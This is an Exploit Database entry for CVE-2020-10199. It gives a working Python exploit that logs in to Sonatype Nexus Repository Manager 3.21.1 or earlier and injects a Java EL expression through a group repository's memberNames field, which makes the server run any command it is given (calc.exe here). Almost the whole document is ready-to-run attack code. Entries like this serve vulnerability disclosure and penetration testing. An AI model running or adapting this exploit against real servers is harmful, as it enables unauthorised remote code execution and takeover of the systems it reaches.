Sonatype Nexus 3.21.1 – Remote Code Execution (Authenticated)

• Exploit Database
• 54 阅读

• 作者： 1F98D
  日期： 2021-01-06
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/49385/

• # Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
  # Exploit Author: 1F98D
  # Original Author: Alvaro Muñoz
  # Date: 27 May 2020
  # Vendor Hompage: https://www.sonatype.com/
  # CVE: CVE-2020-10199
  # Tested on: Windows 10 x64
  # References:
  # https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
  # https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
  # 
  # Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
  # to Java EL injection which allows a low privilege user to remotely
  # execute code on the target server.
  #
  #!/usr/bin/python3
  
  import sys
  import base64
  import requests
  
  URL='http://192.168.1.1:8081'
  CMD='cmd.exe /c calc.exe'
  USERNAME='admin'
  PASSWORD='password'
  
  s = requests.Session()
  print('Logging in')
  body = {
  'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
  'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
  }
  r = s.post(URL + '/service/rapture/session',data=body)
  if r.status_code != 204:
  print('Login unsuccessful')
  print(r.status_code)
  sys.exit(1)
  print('Logged in successfully')
  
  body = {
  'name': 'internal',
  'online': True,
  'storage': {
  'blobStoreName': 'default',
  'strictContentTypeValidation': True
  },
  'group': {
  'memberNames': [
  '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
  ]
  },
  }
  r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
  if 'java.lang.ProcessImpl' in r.text:
  print('Command executed')
  sys.exit(0)
  else:
  print('Error executing command, the following was returned by Nexus')
  print(r.text)